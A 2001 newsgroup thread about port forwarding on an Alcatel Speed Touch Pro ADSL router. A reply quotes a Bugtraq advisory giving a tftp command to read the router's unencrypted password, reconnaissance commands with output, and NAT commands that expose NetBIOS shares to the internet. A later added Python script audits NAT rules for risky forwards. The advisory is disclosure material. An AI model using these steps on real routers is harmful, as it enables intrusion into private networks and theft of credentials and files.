
Router, Adsl, Lan


Liceo Serpieri

Aug 21, 2001, 1:42:07 AM
Hello everyone.
I have a LAN connected to an ADSL router; the LAN uses the addresses
192.168.x.x and the router 217.y.y.y (I can never remember it, anyway it is
static).
I can access the Internet from all the PCs but, since one PC also acts
as a SERVER (Linux), I would like to be able to access the server from
outside (e.g. from my home).
I know that static NAT and PAT, to be configured on the router, come into
it, but how they come into it I do not know.

Can anyone help me? Maybe even just where I can find
(some nice site) information on the subject.

Thanks to everyone


poker

Aug 21, 2001, 4:32:55 AM

"Liceo Serpieri" <serp...@XYZrimini.com> wrote in message
news:3b81f36...@news.tin.it...
If you tell us which router you have, maybe we can help you!


Liceo Serpieri

Aug 21, 2001, 4:48:52 AM

>If you tell us which router you have, maybe we can help you!
>
>

Sorry: I have an Alcatel Speed Touch Pro with Firewall
Thanks

poker

Aug 21, 2001, 7:14:24 AM

"Liceo Serpieri" <serp...@XYZrimini.com> wrote in message
news:3b822074...@news.tin.it...

>
> >If you tell us which router you have, maybe we can help you!
> >
> >
>
> Sorry: I have an Alcatel Speed Touch Pro with Firewall
> Thanks

Look below and let me know if it is useful to you ... obviously you will
have to configure the static NAT ONLY for the TCP/IP ports you are interested in
... by the way, if the router was given to you on loan and they have
"locked it down" with various passwords, your ISP will need to give you the
password or configure the router for you via telnet (if it is Telecom, I
sincerely wish you good luck, because it will be an Odyssey).

Let me know


ALCATEL Speed Touch PRO port redirect exploit

--------------------------------------------------------------------------------

To: BUG...@SECURITYFOCUS.COM
Subject: ALCATEL Speed Touch PRO port redirect exploit
From: Stefano Chiccarelli <s.chic...@NEWTEL.IT>
Date: Tue, 24 Apr 2001 10:15:32 +0200
Approved-By: ale...@SECURITYFOCUS.COM
Delivered-To: bug...@lists.securityfocus.com
Delivered-To: BUG...@SECURITYFOCUS.COM
Reply-To: Stefano Chiccarelli <s.chic...@NEWTEL.IT>
Sender: Bugtraq List <BUG...@SECURITYFOCUS.COM>

--------------------------------------------------------------------------------

Taking advantage of the ALCATEL Speed Touch Pro backdoor and configuration
problems, it is possible to obtain "full priv" access to the router and
launch several attacks against the internal LAN thanks to the NAT/PAT
feature often made available.

If the router is "telnetable" it means that "ip config firewalling" mode is
"off", accepting internet connections at the wan
interface's IP. Now the choice is
a - use Shimomura Tsutomu's Backdoor
b - use this commandline tftp -i IPTARGET GET active/system.ini to read the
unencrypted password.

Among other things, it is possible to gain access to the computer(s) behind
the router. 90 times out of 100, you will find a Microsoft-based
LAN (especially a NETBIOS LAN) active. So the intruder can map the whole
"network status" following the menu
IP>
and then
arplist

The screen looks like this
neuro@neuroneuro$ --> telnet router
Trying 192.168.0.1...
Connected to router.
Escape character is '^]'.
User :
SpeedTouch (00-90-D0-04-47-0D)
Password :
######----------------------------------------------------------------------
--
*
* ______
* ___/_____/\
* / /\\ ALCATEL ADSL MODEM
* _____/__ / \\
* _/ /\_____/___ \ Version 3.2
* // / \ /\ \
* _______//_______/ \ / _\/______ Copyright 1999-2000.
* / / \ \ / / / /\
* __/ / \ \ / / / / _\__
* / / / \_______\/ / / / / /\
* /_/______/___________________/ /________/ /___/ \
* \ \ \ ___________ \ \ \ \ \ /
* \_\ \ / /\ \ \ \ \___\/
* \ \/ / \ \ \ \ /
* \_____/ / \ \ \________\/
* /__________/ \ \ /
* \ _____ \ /_____\/
* \ / /\ \ /
* /____/ \ \ /
* \ \ /___\/
* \____\/
*
-----------------------------------------------------------------------
=>ip
[ip]=>arplist
Intf IP-address HW-address Type
eth0 192.168.0.2 00:00:b4:59:36:6c DYNAMIC
eth0 192.168.0.3 00:c0:26:ca:25:5e DYNAMIC
[ip]=>


It is even possible to check the routing table to learn the internal LAN
addressing.
The command is
[ip]=>rtlist
Destination Source Gateway Intf Mtrc
192.168.0.0/24 192.168.0.0/24 192.168.0.1 eth0 1
192.168.0.1/32 0.0.0.0/0 192.168.0.1 eth0 0
217.59.X.XXX/32 0.0.0.0/0 217.59.X.XXX cip0 0
127.0.0.1/32 0.0.0.0/0 127.0.0.1 loop 0
217.59.X.XXX/30 0.0.0.0/0 217.59.X.XXX cip0 1
192.168.0.0/24 0.0.0.0/0 192.168.0.1 eth0 1
0.0.0.0/0 0.0.0.0/0 217.59.X.XXX cip0 1


Now, let's ping the other machines to find the "powered on" ones (for sure
the boxes shown by arplist, but there could be some "hidden" machine)
[ip]=>:ip ping addr=192.168.0.2 count=10 size=100 interval=100 listen=off
108 bytes from 192.168.0.2: icmp_seq=0 time=2511 us
108 bytes from 192.168.0.2: icmp_seq=1 time=2337 us
108 bytes from 192.168.0.2: icmp_seq=2 time=2393 us
108 bytes from 192.168.0.2: icmp_seq=3 time=2314 us
108 bytes from 192.168.0.2: icmp_seq=4 time=2324 us
108 bytes from 192.168.0.2: icmp_seq=5 time=2333 us
108 bytes from 192.168.0.2: icmp_seq=6 time=2453 us
108 bytes from 192.168.0.2: icmp_seq=7 time=2350 us
108 bytes from 192.168.0.2: icmp_seq=8 time=2299 us
108 bytes from 192.168.0.2: icmp_seq=9 time=2353 us

We've found that 192.168.0.2 is on, and we can redirect the ports thanks
to the NAT/PAT features, so that we are allowed to access 192.168.0.2
from the outside.

It is now possible to redirect the ports 137,138,139 TCP/UDP and map the
NetBIOS resources straight to the internet.
The command is

NAT>create protocol=tcp inside_addr=192.168.0.2:137 outside_addr=217.59.9.154:137
[repeat for all the ports (either tcp or udp) you are interested in]

After this step, the intruder can open the shared directories on the
private-IP LAN behind the ALCATEL router.

\\ipdelrouteralcatel

Sharing whole HD's on a private LAN is quite common, because people feel
protected from outside attacks.
It is obvious that it is possible to redirect ALL tcp/udp ports toward
those services we know to be "bugged".
The only limit is the fantasy.

Greetings:
:: Franko21 :: rubik :: Andrea Monti :: Metro Olografix Member ::

---------------------------------------------
Stefano "NeURo" Chiccarelli
Metro Olografix Association
ne...@olografix.org

Chief security officer for:
- Studio Legale Monti
http://www.andreamonti.net

- Nuova Newtel s.r.l.
http://www.newtel.it

65126(PESCARA,Italy)
Tel: 39+085 44825267 fax: 39+085 44825280
--------------------------------------------
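
A defensive check for the advice in this thread to publish only the ports you actually need: an added example, not part of the original posts or of the advisory. It assumes the router's static NAT entries have been saved as text, one `create` command per line in the syntax quoted in the advisory; the `audit` function, the allow-list and the sample addresses are constructed for illustration.

```python
import re
from typing import NamedTuple

# Ports the advisory singles out (NetBIOS) plus the management services it
# mentions (telnet, tftp); none of these belong on the WAN side.
RISKY = {137: "netbios-ns", 138: "netbios-dgm", 139: "netbios-ssn",
         23: "telnet", 69: "tftp"}

ENTRY = re.compile(
    r"create\s+protocol=(?P<proto>tcp|udp)\s+"
    r"inside_addr=(?P<in_ip>[\d.]+):(?P<in_port>\d+)\s+"
    r"outside_addr=(?P<out_ip>[\d.]+):(?P<out_port>\d+)", re.I)

class Finding(NamedTuple):
    line_no: int
    severity: str
    reason: str

def audit(config_text, allowed):
    """Return a Finding for every forward that is risky or not approved.

    `allowed` is a set of (protocol, inside_ip, inside_port) tuples that the
    administrator deliberately published.
    """
    findings = []
    for no, line in enumerate(config_text.splitlines(), 1):
        m = ENTRY.search(line)
        if not m:
            continue  # not a static NAT entry
        proto = m["proto"].lower()
        key = (proto, m["in_ip"], int(m["in_port"]))
        out_port = int(m["out_port"])
        if out_port in RISKY or key[2] in RISKY:
            name = RISKY.get(out_port) or RISKY[key[2]]
            findings.append(Finding(no, "high",
                f"{name} reachable from WAN via {proto}/{out_port}"))
        elif key not in allowed:
            findings.append(Finding(no, "review",
                f"unapproved forward {proto}/{out_port} -> {key[1]}:{key[2]}"))
    return findings

# Constructed sample: one intended forward (SSH to the Linux server), one
# NetBIOS forward of the kind the advisory describes, one unknown forward.
SAMPLE = """\
NAT>create protocol=tcp inside_addr=192.168.0.10:22 outside_addr=203.0.113.10:22
NAT>create protocol=tcp inside_addr=192.168.0.2:139 outside_addr=203.0.113.10:139
NAT>create protocol=tcp inside_addr=192.168.0.3:8080 outside_addr=203.0.113.10:8080
"""
ALLOWED = {("tcp", "192.168.0.10", 22)}

if __name__ == "__main__":
    for finding in audit(SAMPLE, ALLOWED):
        print(finding)
```
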


Liceo Serpieri

Aug 22, 2001, 4:00:02 AM
Thanks, it works perfectly!!!!